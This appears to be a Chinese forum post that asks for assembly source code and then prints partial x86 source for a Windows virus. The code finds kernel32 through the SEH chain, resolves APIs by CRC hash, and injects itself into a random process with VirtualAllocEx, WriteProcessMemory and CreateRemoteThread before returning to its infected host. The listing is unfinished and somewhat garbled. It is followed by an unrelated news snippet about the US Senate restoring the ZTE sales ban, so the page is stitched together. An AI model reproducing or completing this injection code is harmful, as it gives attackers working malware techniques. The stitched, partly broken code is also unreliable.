求购Asm总源码

求购Asm总源码。有的朋友给留个言,或在下面回复给个连接也行。谢谢!
#
CRC16 MACRO string, lstr
CRC_VALUE = 0ffffffffh
IRPC CRC_BYTE, lstr
CRC_VALUE = CRC_VALUE xor ‘&CRC_BYTE’
REPT 8
CRC_VALUE = (CRC_VALUE shr 1) xor ((CRC_VALUE and 1) * 0edb88320h)
ENDM
ENDM
CRC_VALUE = CRC_VALUE xor 0ffffffffh
dw (CRC_VALUE and 0ffffh)
ENDMAPIDEF MACRO string, sym
CRC16, sym
sym = vEnd + VARLEN + APICOUNT
APICOUNT = APICOUNT + 6
ENDM

VARDEF MACRO string, sym, vw
sym = VARCOUNT
VARCOUNT = VARCOUNT + vw
ENDM

LIBDEF MACRO string, sym, lstr
local l1, l2
l1:
db lstr, 0
l2:
sym = LIBCOUNT
LIBCOUNT = LIBCOUNT + (l2 – l1)
ENDM

pushsz MACRO lstr
local pushstr
call pushstr
db lstr, 0
pushstr:
ENDM

rdtsc MACRO
db 0fh, 31h
ENDM

ShowMessage MACRO lstr
IF DEBUG
OUTPUTMESSAGE = 1
pushsz, lstr
call OutputMessage
ENDIF
ENDM

WIN32_FIND_DATAA STRUCT
dwFileAttributes DWORD ?
ftCreationTime QWORD ?
ftLastAccessTime QWORD ?
ftLastWriteTime QWORD ?
nFileSizeHigh DWORD ?
nFileSizeLow DWORD ?
dwReserved0 DWORD ?
dwReserved1 DWORD ?
cFileName BYTE 260 dup(?)
cAlternateFileName BYTE 14 dup(?)
ALIGN 4
WIN32_FIND_DATAA ENDS
PROCESSENTRY32 STRUCT
dwSize DWORD ?
cntUsage DWORD ?
th32ProcessID DWORD ?
th32DefaultHeapID DWORD ?
th32ModuleID DWORD ?
cntThreads DWORD ?
th32ParentProcessID DWORD ?
pcPriClassBase DWORD ?
dwFlags DWORD ?
szExeFile BYTE 260 dup(?)
PROCESSENTRY32 ENDS

;——————————————————–
DEBUG = 1
OUTPUTMESSAGE = 0
VARLEN = 140h
vSize = vEnd – vBegin
vdelta = vEnd + 80h
MAX_PATH = 104h
VARCOUNT = 0
APICOUNT = 0
LIBCOUNT = 0
MainLoaderSize equ 26
MiniLoaderSize equ 10
FILE_WRITE_ENABLE equ 00000001b
RING0_CODE_ALLOW equ 00000010b
USED_MINI_LOADER equ 00000100b
NTK_API_INIT equ 8
NTL_API_INIT equ 9
;****************************************************************************
; 全局变量结构
;****************************************************************************
VARCOUNT = -80h
VARDEF, var_k32base, 4
VARDEF, var_vbase, 4
VARDEF, var_temp1, 4
VARDEF, var_temp2, 4
VARDEF, var_temp3, 4
VARDEF, var_temp4, 4
VARDEF, var_flags, 4
VARDEF, var_fname, 4
VARDEF, var_ftime, 8
VARDEF, var_fsize, 8
VARDEF, var_fpatch, 4
VARDEF, var_hFile, 4
VARDEF, var_hMap, 4
VARDEF, var_pMem, 4
VARDEF, var_kfmap, 4
VARDEF, var_hostcall, 4
VARDEF, fun_random, 4
VARDEF, fun_knlxx, 4
VARDEF, var_voff, 4
VARDEF, var_vkey, 4
;——————————————————–
VARCOUNT = 0
VARDEF, fun_WNetCloseEnum, 4
VARDEF, fun_WNetEnumResourceA, 4
VARDEF, fun_WNetOpenEnumA, 4
.DATA
;****************************************************************************
; 初始化
;****************************************************************************
vBegin:
push eax
add esp, 4
db 90h
db 90h
push eax
pushfd
pushad ;保存宿主上下文
enter 40h, 0
cld
xor ebx, ebx
mov eax, fs:[ebx]
xchg esi, eax
lodsd
cmp eax, -1
jne $ – 5 ;查找SEH链尾
mov edx, [esi]

FindK32Base:
dec edx
xor dx, dx
cmp word ptr [edx], ‘ZM’
jne FindK32Base

mov eax, [edx + 3ch]
cmp dword ptr [edx + eax], ‘EP’
jne FindK32Base

call PUSHINITDATA
K32BaseValue dd 0
CRC16, CloseHandle ;40h
CRC16, CreateRemoteThread ;3ch
CRC16, CreateToolhelp32Snapshot ;38h
CRC16, OpenProcess ;34h
CRC16, Process32First ;30h
CRC16, Process32Next ;2ch
CRC16, VirtualAllocEx ;28h
CRC16, VirtualFreeEx ;24h
CRC16, WriteProcessMemory ;20h
db 00h

PUSHINITDATA:
pop esi
mov [esi], edx
lodsd
lea edi, [ebp – 40h]
call GetApiAddressFromList

call $ + 9 + MainLoaderSize
modifyaddr db 4 dup(?)
modifydata db MainLoaderSize dup(?)
pop esi
lodsd
mov [ebp + 28h], eax ;写入返回宿主的地址

push ebx ;lpNumberOfBytesWritten=NULL
push MainLoaderSize ;nSize
push esi ;lpBuffer
push eax ;lpBaseAddress
push -1 ;hProcess
call [ebp – 20h] ;WriteProcessMemory

rdtsc
call srand ;更新随机数种子
and al, 1
jnz AttachCurrentProcess

call EnumProcess
push eax ;dwProcessId
push 0 ;bInheritHandle
push 1f0fffh ;PROCESS_ALL_ACCESS
call [ebp – 34h] ;OpenProcess
test eax, eax
jz AttachCurrentProcess
xchg edi, eax

call CreateVirusThread
pushfd
push edi ;hProcess
call [ebp – 40h] ;CloseHandle
popfd
jnc ReturnHost

AttachCurrentProcess:
or edi, -1
call CreateVirusThread

ReturnHost:
leave
popad
popfd
ret ;返回宿主
;——————————————————–
EnumProcess:
mov ebx, ebp
enter size PROCESSENTRY32, 0
mov esi, esp
push 0 ;TH32CS_INHERIT
push 2 ;TH32CS_SNAPPROCESS
call [ebx – 38h] ;CreateToolhelp32Snapshot
xchg edi, eax

mov [esi].dwSize, size PROCESSENTRY32
push esi ;lppe
push edi ;hSnapshot
call [ebx – 30h] ;Process32First
xchg ecx, eax
jecxz NoProcessExist

GetNextProcess:
IF DEBUG
cmp dword ptr [esi].szExeFile, ‘eton’
jne $ + 5
ENDIF
push dword ptr [esi].th32ProcessID
push esi ;lppe
push edi ;hSnapshot
call [ebx – 2ch] ;Process32Next
test eax, eax
jnz GetNextProcess

NoProcessExist:
push edi ;hSnapshot
call [ebx – 40h] ;CloseHandle
mov eax, esi
sub eax, esp
jz EnumProcess_Return

shr eax, 2
call random
mov eax, [esp + eax * 4] ;随机选一个进程返回
mov esp, esi

EnumProcess_Return:
leave
ret
;——————————————————–
CreateVirusThread:
xor esi, esi
xor eax, eax
push 40h ;PAGE_EXECUTE_READWRITE
mov ah, 10h
push eax ;MEM_COMMIT
mov ah, 50h
push eax ;分配内存大小(20K)
push esi ;NULL
push edi ;hProcess
call [ebp – 28h] ;VirtualAllocEx
mov ebx, eax ;保存内存地址
test eax, eax
jz CreateVirusThread_Return

call $ + 5
pop eax
sub eax, $ – vBegin – 1 ;指向病毒代码

push esi ;lpNumberOfBytesWritten=NULL
push vSize ;nSize
push eax ;lpBuffer
push ebx ;lpBaseAddress
push edi ;hProcess
call [ebp – 20h] ;WriteProcessMemory
xchg ecx, eax
jecxz CreateFailed

lea eax, [ebx + MyVirusStart – vBegin]
push esi
push esp ;lpThreadId
push esi ;NULL
push ebx ;lpParameter=内存基址
push eax ;MyVirusStart
push esi ;0
push esi ;NULL
push edi ;hProcess
call [ebp – 3ch] ;CreateRemoteThread
pop edx
xchg ecx, eax
jecxz CreateFailed
clc
ret

CreateFailed:
mov ch, 80h
push ecx ;MEM_RELEASE
push esi ;dwSize=0
push ebx ;lpAddress
push edi ;hProcess
call [ebp – 24h] ;VirtualFreeEx

CreateVirusThread_Return:
stc
ret
;****************************************************************************
; 获取API,生成调用转向表(ESI:API-CRC列表,EDI:写入地址,EDX:模块句柄)
;****************************************************************************
BuildImportTable:
pushad
xor ecx, ecx
inc ecx
inc ecx
cmp [esi + ecx], ch ;此处假设API总数少于128个
jne $ – 5

add edi, ecx
call GetApiAddressFromList
mov esi, edi
sub edi, ecx
shr ecx, 1

mov al, 068h ;push
stosb
movsd
mov al, 0c3h ;ret
stosb
loop $ – 7
popad
ret
;——————————————————–
GetApiAddressFromList:
pushad
mov ecx, [edx + 3ch]
add ecx, edx
mov ebx, [ecx + 78h]
;ExporyTableAddress
add ebx, edx
or ebp, -1 ;计数寄存器

SearchNextAPI:
mov ecx, [ebx + 20h] ;AddressOfNames
add ecx, edx

ContinueSearch:
inc ebp
mov eax, edx
add eax, [ecx + ebp * 4] ;取API名称字符串
call vStrToCRC
cmp [esi], ax
jne ContinueSearch

mov eax, [ebx + 24h] ;AddressOfNameOrdinals
add eax, edx
movzx eax, word ptr [eax + ebp * 2]
mov ecx, [ebx + 1ch] ;AddressOfFunctions
add ecx, edx
mov eax, [ecx + eax * 4]
add eax, edx
stosd ;保存API地址

inc esi
inc esi
cmp byte ptr [esi], 0 ;API名的CRC16列表以单个0结束
jne SearchNextAPI
popad
ret
;****************************************************************************
system32

//未完//

 

 

 

美国参议院投票恢复对中兴销售禁令

特朗普计划把中兴从重症监护室转到普通病房,途中却被众议院抬去了太平间,特朗普又赶紧把中兴从太平间门口拦下重新转回重症监护室,经过抢救,奄奄一息的中兴又死里逃生了。就在养病中,参议院突然走过来拔掉管子……

美国参议院周一投票通过恢复中兴通讯销售禁令法案,罕见地推翻了总统特朗普(Donald Trump)的决定。

摘录与电子工程